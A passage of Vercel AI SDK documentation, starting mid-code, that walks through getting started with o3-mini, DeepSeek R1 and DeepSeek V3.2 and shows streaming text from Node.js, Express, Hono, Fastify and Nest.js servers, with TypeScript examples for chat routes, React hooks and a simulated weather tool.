steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
Using Tools with the AI SDK
o3-mini supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai('o3-mini'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
});
In this example, the getWeather tool allows the model to fetch real-time weather data (simulated for simplicity), enhancing its ability to provide accurate and up-to-date information.
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and OpenAI o3-mini:
In a new Next.js application, first install the AI SDK and the OpenAI provider:
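For example, with pnpm (the npm, yarn, and bun commands follow the same pattern; the package names match the imports used below):
pnpm add ai @ai-sdk/openai @ai-sdk/react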
Then, create a route handler for the chat endpoint:
import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow responses up to 5 minutes
export const maxDuration = 300;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: openai('o3-mini'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}
      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          name="prompt"
          value={input}
          onChange={e => setInput(e.target.value)}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out our support for o3-mini in the OpenAI Provider.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Get started with DeepSeek R1 description: Get started with DeepSeek R1 using the AI SDK. tags: ['getting-started', 'reasoning']
Get started with DeepSeek R1
With the release of DeepSeek R1, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek R1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek R1
DeepSeek R1 is a series of advanced AI models designed to tackle complex reasoning tasks in science, coding, and mathematics. These models are optimized to "think before they answer," producing detailed internal chains of thought that aid in solving challenging problems.
The series includes two primary variants:
- DeepSeek R1-Zero: Trained exclusively with reinforcement learning (RL) without any supervised fine-tuning. It exhibits advanced reasoning capabilities but may struggle with readability and formatting.
- DeepSeek R1: Combines reinforcement learning with cold-start data and supervised fine-tuning to improve both reasoning performance and the readability of outputs.
Benchmarks
DeepSeek R1 models excel in reasoning tasks, delivering competitive performance across key benchmarks:
- AIME 2024 (Pass@1): 79.8%
- MATH-500 (Pass@1): 97.3%
- Codeforces (Percentile): Top 4% (96.3%)
- GPQA Diamond (Pass@1): 71.5%
Prompt Engineering for DeepSeek R1 Models
DeepSeek R1 models excel with structured and straightforward prompts. The following best practices can help achieve optimal performance:
- Use a structured format: Leverage the model’s preferred output structure with <think> tags for reasoning and <answer> tags for the final result.
- Prefer zero-shot prompts: Avoid few-shot prompting as it can degrade performance; instead, directly state the problem clearly.
- Specify output expectations: Guide the model by defining desired formats, such as markdown for readability or XML-like tags for clarity.
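For example, a prompt applying these recommendations might look like this (an illustrative sketch, not a required format):
Solve the following problem. Put your step-by-step reasoning inside <think> tags and only the final result inside <answer> tags.
Problem: What is the sum of the first 100 positive integers?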
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek R1 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { reasoningText, text } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'Explain quantum entanglement.',
});
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use DeepSeek R1 via Fireworks:
import { fireworks } from '@ai-sdk/fireworks';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: fireworks('accounts/fireworks/models/deepseek-r1'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
Or to use Groq's deepseek-r1-distill-llama-70b model:
import { groq } from '@ai-sdk/groq';
import {
generateText,
wrapLanguageModel,
extractReasoningMiddleware,
} from 'ai';
// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
model: groq('deepseek-r1-distill-llama-70b'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
const { reasoningText, text } = await generateText({
model: enhancedModel,
prompt: 'Explain quantum entanglement.',
});
When using DeepSeek-R1 series models with third-party providers like Together AI, we recommend setting the startWithReasoning option in the extractReasoningMiddleware function, as these deployments often omit the opening <think> tag and begin the response mid-reasoning.
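A minimal sketch of that setup, assuming the @ai-sdk/togetherai provider package and mirroring the Fireworks and Groq examples above:
import { togetherai } from '@ai-sdk/togetherai';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

const enhancedModel = wrapLanguageModel({
  model: togetherai('deepseek-ai/DeepSeek-R1'),
  middleware: extractReasoningMiddleware({
    tagName: 'think',
    startWithReasoning: true, // treat output as reasoning until the closing tag
  }),
});

const { reasoningText, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});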
Model Provider Comparison
You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:
| Provider | Model ID | Reasoning Tokens |
|---|---|---|
| DeepSeek | deepseek-reasoner | Supported |
| Fireworks | accounts/fireworks/models/deepseek-r1 | Requires Middleware |
| Groq | deepseek-r1-distill-llama-70b | Requires Middleware |
| Azure | DeepSeek-R1 | Requires Middleware |
| Together AI | deepseek-ai/DeepSeek-R1 | Requires Middleware |
| FriendliAI | deepseek-r1 | Requires Middleware |
| LangDB | deepseek/deepseek-reasoner | Requires Middleware |
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
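For example, with pnpm (the npm, yarn, and bun commands follow the same pattern; the package names match the imports used below):
pnpm add ai @ai-sdk/deepseek @ai-sdk/react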
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Limitations
While DeepSeek R1 models are powerful, they have certain limitations:
- No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
- No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
title: Get started with DeepSeek V3.2 description: Get started with DeepSeek V3.2 using the AI SDK. tags: ['getting-started', 'agents']
Get started with DeepSeek V3.2
With the release of DeepSeek V3.2, there has never been a better time to start building AI applications that require advanced reasoning and agentic capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like DeepSeek V3.2 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
DeepSeek V3.2
DeepSeek V3.2 is a frontier model that harmonizes high computational efficiency with superior reasoning and agent performance. It introduces several key technical breakthroughs that enable it to perform comparably to GPT-5 while remaining open-source.
The series includes two primary variants:
- DeepSeek V3.2: The official successor to V3.2-Exp. A balanced model optimized for both reasoning and inference efficiency, delivering GPT-5 level performance.
- DeepSeek V3.2-Speciale: A high-compute variant with maxed-out reasoning capabilities that rivals Gemini-3.0-Pro. Achieves gold-medal performance in IMO 2025, CMO 2025, ICPC World Finals 2025, and IOI 2025. As of release, it does not support tool-use.
Benchmarks
DeepSeek V3.2 models excel in both reasoning and agentic tasks, delivering competitive performance across key benchmarks:
Reasoning Capabilities
- AIME 2025 (Pass@1): 96.0% (Speciale)
- HMMT 2025 (Pass@1): 99.2% (Speciale)
- HLE (Pass@1): 30.6%
- Codeforces (Rating): 2701 (Speciale)
Agentic Capabilities
- SWE Verified (Resolved): 73.1%
- Terminal Bench 2.0 (Acc): 46.4%
- τ2 Bench (Pass@1): 80.3%
- Tool Decathlon (Pass@1): 35.2%
Model Options
When using DeepSeek V3.2 with the AI SDK, you have two model options:
| Model Alias | Model Version | Description |
|---|---|---|
| deepseek-chat | DeepSeek-V3.2 (Non-thinking Mode) | Standard chat model |
| deepseek-reasoner | DeepSeek-V3.2 (Thinking Mode) | Enhanced reasoning for complex problem-solving |
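For example, to use the thinking-mode variant and read its reasoning output (following the deepseek-reasoner usage shown in the DeepSeek R1 guide above):
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { reasoningText, text } = await generateText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'Prove that the square root of 2 is irrational.',
});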
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building agents, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call DeepSeek V3.2 with the AI SDK:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Explain the concept of sparse attention in transformers.',
});
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building an agent with Next.js, the AI SDK, and DeepSeek V3.2:
In a new Next.js application, first install the AI SDK and the DeepSeek provider:
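For example, with pnpm (the npm, yarn, and bun commands follow the same pattern; the package names match the imports used below):
pnpm add ai @ai-sdk/deepseek @ai-sdk/react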
Then, create a route handler for the chat endpoint:
import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent<HTMLFormElement>) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
if (part.type === 'text' || part.type === 'reasoning') {
return <div key={index}>{part.text}</div>;
}
return null;
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Submit</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Enhance Your Agent with Tools
One of the key strengths of DeepSeek V3.2 is its agentic capabilities. You can extend your agent's functionality by adding tools that allow the model to perform specific actions or retrieve information.
Update Your Route Handler
Let's add a weather tool to your agent. Update your route handler at app/api/chat/route.ts:
import { deepseek } from '@ai-sdk/deepseek';
import {
convertToModelMessages,
stepCountIs,
streamText,
tool,
UIMessage,
} from 'ai';
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: deepseek('deepseek-reasoner'),
messages: await convertToModelMessages(messages),
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
unit: 'fahrenheit',
}),
}),
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse({ sendReasoning: true });
}
This adds a weather tool that the model can call when needed. The stopWhen: stepCountIs(5) setting allows the agent to continue executing for multiple steps (up to 5), enabling it to use tools and reason iteratively before stopping. Learn more about loop control to customize when and how your agent stops execution.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Guides description: Learn how to build AI applications with the AI SDK
Guides
These use-case specific guides are intended to help you build real applications with the AI SDK.
<IndexCards cards={[ { title: 'RAG Agent', description: 'Learn how to build a RAG Agent with the AI SDK and Next.js.', href: '/cookbook/guides/rag-chatbot', }, { title: 'Multi-Modal Agent', description: 'Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.', href: '/cookbook/guides/multi-modal-chatbot', }, { title: 'Slackbot Agent', description: 'Learn how to use the AI SDK to build an AI Agent in Slack.', href: '/cookbook/guides/slackbot', }, { title: 'Natural Language Postgres (SQL Agent)', description: 'Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language.', href: '/cookbook/guides/natural-language-postgres', }, { title: 'Get started with Computer Use', description: "Get started with Claude's Computer Use capabilities with the AI SDK.", href: '/cookbook/guides/computer-use', }, { title: 'Add Skills to Your Agent', description: 'Extend your agent with specialized capabilities loaded at runtime from markdown files.', href: '/cookbook/guides/agent-skills', }, { title: 'Get started with Gemini 2.5', description: 'Get started with Gemini 2.5 using the AI SDK.', href: '/cookbook/guides/gemini-2-5', }, { title: 'Get started with Claude 4', description: 'Get started with Claude 4 using the AI SDK.', href: '/cookbook/guides/claude-4', }, { title: 'OpenAI Responses API', description: 'Get started with the OpenAI Responses API using the AI SDK.', href: '/cookbook/guides/openai-responses', }, { title: 'Get started with Claude 3.7 Sonnet', description: 'Get started with Claude 3.7 Sonnet using the AI SDK.', href: '/cookbook/guides/sonnet-3-7', }, { title: 'Get started with Llama 3.1', description: 'Get started with Llama 3.1 using the AI SDK.', href: '/cookbook/guides/llama-3_1', }, { title: 'Get started with GPT-5', description: 'Get started with GPT-5 using the AI SDK.', href: '/cookbook/guides/gpt-5', }, { title: 'Get started with OpenAI o1', description: 'Get started with OpenAI o1 using the AI SDK.', href: '/cookbook/guides/o1', }, { title: 'Get started with OpenAI o3-mini', description: 'Get started with OpenAI o3-mini using the AI SDK.', href: '/cookbook/guides/o3', }, { title: 'Get started with DeepSeek R1', description: 'Get started with DeepSeek R1 using the AI SDK.', href: '/cookbook/guides/r1', }, ]} />
title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']
Node.js HTTP Server
You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/node-http-server
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}).listen(8080);
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
switch (req.url) {
case '/stream-data': {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some custom data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response: res });
break;
}
}
}).listen(8080);
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import { createServer } from 'http';
createServer(async (req, res) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}).listen(8080);
Troubleshooting
- Streaming not working when proxied
title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']
Express
You can use the AI SDK in an Express server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/express
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Sending Custom Data
pipeUIMessageStreamToResponse can be used to send custom data to the client.
import {
createUIMessageStream,
pipeUIMessageStreamToResponse,
streamText,
} from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/custom-data-parts', async (req: Request, res: Response) => {
pipeUIMessageStreamToResponse({
response: res,
stream: createUIMessageStream({
execute: async ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(result.toUIMessageStream({ sendStart: false }));
},
}),
});
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Text Stream
You can send a text stream to the client using pipeTextStreamToResponse.
import { streamText } from 'ai';
import express, { Request, Response } from 'express';
const app = express();
app.post('/', async (req: Request, res: Response) => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
});
app.listen(8080, () => {
console.log(`Example app listening on port ${8080}`);
});
Troubleshooting
- Streaming not working when proxied
title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']
Hono
You can use the AI SDK in a Hono server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/hono
UI Message Stream
You can use the toUIMessageStreamResponse method to create a properly formatted streaming response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
return result.toUIMessageStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Text Stream
You can use the toTextStreamResponse method to return a text stream response.
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/text', async c => {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Write a short poem about coding.',
});
return result.toTextStreamResponse();
});
serve({ fetch: app.fetch, port: 8080 });
Sending Custom Data
You can use createUIMessageStream and createUIMessageStreamResponse to send custom data to the client.
import { serve } from '@hono/node-server';
import {
createUIMessageStream,
createUIMessageStreamResponse,
streamText,
} from 'ai';
import { Hono } from 'hono';
const app = new Hono();
app.post('/stream-data', async c => {
// immediately start streaming the response
const stream = createUIMessageStream({
execute: ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
return createUIMessageStreamResponse({ stream });
});
serve({ fetch: app.fetch, port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']
Fastify
You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.
Examples
The examples start a simple HTTP server that listens on port 8080. You can test it with curl, for example:
curl -X POST http://localhost:8080
Full example: github.com/vercel/ai/examples/fastify
UI Message Stream
You can use the toUIMessageStream method to get a UI message stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.toUIMessageStream());
});
fastify.listen({ port: 8080 });
Sending Custom Data
createUIMessageStream can be used to send custom data to the client.
import { createUIMessageStream, streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/stream-data', async function (request, reply) {
// immediately start streaming the response
const stream = createUIMessageStream({
execute: async ({ writer }) => {
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'initialized call',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(result.toUIMessageStream({ sendStart: false }));
},
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(stream);
});
fastify.listen({ port: 8080 });
Text Stream
You can use the textStream property to get a text stream from the result and then pipe it to the response.
import { streamText } from 'ai';
import Fastify from 'fastify';
const fastify = Fastify({ logger: true });
fastify.post('/', async function (request, reply) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
reply.header('Content-Type', 'text/plain; charset=utf-8');
return reply.send(result.textStream);
});
fastify.listen({ port: 8080 });
Troubleshooting
- Streaming not working when proxied
title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']
Nest.js
You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.
Examples
The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.
Full example: github.com/vercel/ai/examples/nest
UI Message Stream
You can use the pipeUIMessageStreamToResponse method to pipe the stream data to the server response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/')
async root(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeUIMessageStreamToResponse(res);
}
}
Sending Custom Data
createUIMessageStream and pipeUIMessageStreamToResponse can be used to send custom data to the client.
import { Controller, Post, Res } from '@nestjs/common';
import {
createUIMessageStream,
streamText,
pipeUIMessageStreamToResponse,
} from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post('/stream-data')
async streamData(@Res() response: Response) {
const stream = createUIMessageStream({
execute: ({ writer }) => {
// write some data
writer.write({ type: 'start' });
writer.write({
type: 'data-custom',
data: {
custom: 'Hello, world!',
},
});
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
writer.merge(
result.toUIMessageStream({
sendStart: false,
onError: error => {
// Error messages are masked by default for security reasons.
// If you want to expose the error message to the client, you can do so here:
return error instanceof Error ? error.message : String(error);
},
}),
);
},
});
pipeUIMessageStreamToResponse({ stream, response });
}
}
Text Stream
You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.
import { Controller, Post, Res } from '@nestjs/common';
import { streamText } from 'ai';
import { Response } from 'express';
@Controller()
export class AppController {
@Post()
async example(@Res() res: Response) {
const result = streamText({
model: 'openai/gpt-4o',
prompt: 'Invent a new holiday and describe its traditions.',
});
result.pipeTextStreamToResponse(res);
}
}
Troubleshooting
- Streaming not working when proxied
title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.
Why use the AI SDK?
Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK standardizes integrating artificial intelligence (AI) models across supported providers. This enables developers to focus on building great AI applications, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
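A minimal sketch, assuming the @ai-sdk/openai and @ai-sdk/anthropic provider packages (the model IDs are examples):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
import { anthropic } from '@ai-sdk/anthropic';

// The call shape stays the same across providers; only the model changes
const { text: fromOpenAI } = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Explain the concept of quantum entanglement.',
});

const { text: fromAnthropic } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'Explain the concept of quantum entanglement.',
});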
The AI SDK has two main libraries:
- AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
- AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interfaces.
Model Providers
The AI SDK supports multiple model providers.
Templates
We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.
Starter Kits
Feature Exploration
Frameworks
Generative UI
Security
Join our Community
If you have questions about anything related to the AI SDK, you're always welcome to ask our community on the Vercel Community.
llms.txt (for Cursor, Windsurf, Copilot, Claude etc.)
